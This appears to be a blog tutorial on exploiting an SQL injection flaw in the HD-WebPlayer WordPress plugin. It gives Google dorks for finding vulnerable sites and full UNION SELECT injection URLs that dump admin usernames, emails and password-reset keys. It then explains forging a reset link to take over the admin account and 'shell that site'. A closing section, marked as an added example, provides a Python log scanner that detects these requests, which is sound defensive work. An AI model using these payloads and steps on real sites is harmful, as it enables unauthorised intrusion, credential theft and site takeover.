Hello. After writing Top 3 Premium Blogger Templates For Free, I was searching for some WordPress exploits, and I found this SQL injection vulnerability in a plugin named HD-WebPlayer. So now, what is the loophole?
Let's begin. Your first step is, as always, to find a vulnerable site using Google dorks.
For this exploit there are 3 special dorks:
Dork #1 (config.php)
inurl:"/wp-content/plugins/hd-webplayer/config.php?id="
Dork #2 (playlist.php)
inurl:"/wp-content/plugins/hd-webplayer/playlist.php?videoid="
Dork #3 (General):
inurl:"/wp-content/plugins/hd-webplayer/"
Use the Google dork to find a vulnerable site like this:
Now you have found the site, so let's try to inject it.
For Example :
http://Site.com/wp-content/plugins/hd-webplayer/config.php?id=2
So replace it with:
http://Site.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11 FROM wp_users--
You have to add the below URL after Site.com:
wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11 FROM wp_users--
Now when you replace that URL, the website must show this. Check what I have replaced: I commanded the database to fetch user_login and user_email from the users table. I am not explaining SQLi to you; I will make a tutorial, so wait for my tutorial or Google about it. So now go to the admin panel login page by typing http://Site.com/wp-login.php or
http://Site.com/wp-admin
And click on Lost your password?
After that, either write the username or the email which you got in the previous step and click Enter. Now again you have to get the authorization code which has been sent to the admin's email, so again you have to inject. Add the below code after the site URL, like http://Site.Com/
http://www.Site.Com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_activation_key,0x3b),5,6,7,8,9,10,11 FROM wp_users--
It will show the data of the authorization code. Now you have to make a custom URL for resetting the password. For resetting, add this URL after http://Site.com/
wp-login.php?action=rp&key=YOUR_RESET_KEY&login=USERNAME
Now replace YOUR_RESET_KEY with the authorization key and USERNAME with the username (I selected admin). Now it will ask you to change the password :) Log in to the dashboard and shell that site.
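Both parameters named above (id on config.php, videoid on playlist.php) should only ever carry a plain integer, so the requests in this post stand out in web server access logs. The Python below is an added example, not part of the original post: it flags such requests, and its log lines are constructed samples in combined log format while the function names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# Plugin directory, endpoints and parameters as named in the post.
PLUGIN_DIR = "/wp-content/plugins/hd-webplayer/"
PARAMS = {"config.php": "id", "playlist.php": "videoid"}
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SQL_WORDS = re.compile(r"\b(union|select|group_concat|wp_users|user_activation_key)\b", re.I)

# Constructed sample log lines (documentation IP ranges, made-up timestamps).
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Oct/2012:13:55:36 +0000] "GET /wp-content/plugins/hd-webplayer/config.php?id=2 HTTP/1.1" 200 512',
    '203.0.113.9 - - [10/Oct/2012:13:56:01 +0000] "GET /wp-content/plugins/hd-webplayer/playlist.php?videoid=-3%20UNION%20SELECT%201,2,3,group_concat(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11%20FROM%20wp_users-- HTTP/1.1" 200 734',
    '203.0.113.9 - - [10/Oct/2012:13:56:09 +0000] "GET /wp-content/plugins/hd-webplayer/playlist.php?videoid=3%27 HTTP/1.1" 200 0',
    '198.51.100.7 - - [10/Oct/2012:13:57:12 +0000] "GET /wp-login.php HTTP/1.1" 200 2048',
]

def classify(request_target):
    """Return 'ok', 'non-integer', 'sqli', or None if not a plugin endpoint."""
    parts = urlsplit(request_target)
    path = unquote_plus(parts.path).lower()
    if not path.startswith(PLUGIN_DIR):
        return None
    param = PARAMS.get(path[len(PLUGIN_DIR):])
    if param is None:
        return None
    verdict = "ok"
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if key.lower() != param:
            continue
        if SQL_WORDS.search(value):       # decoded value contains SQL keywords
            return "sqli"
        if not re.fullmatch(r"\d+", value):  # anything but digits is abnormal
            verdict = "non-integer"
    return verdict

def scan(lines):
    """Return (client_ip, verdict, target) for each suspicious plugin request."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        verdict = classify(m.group(1)) if m else None
        if verdict in ("sqli", "non-integer"):
            hits.append((line.split()[0], verdict, m.group(1)))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A hit on a site that runs this plugin is a reason to review recent password resets for the accounts in wp_users, since the flow in the post ends with a reset.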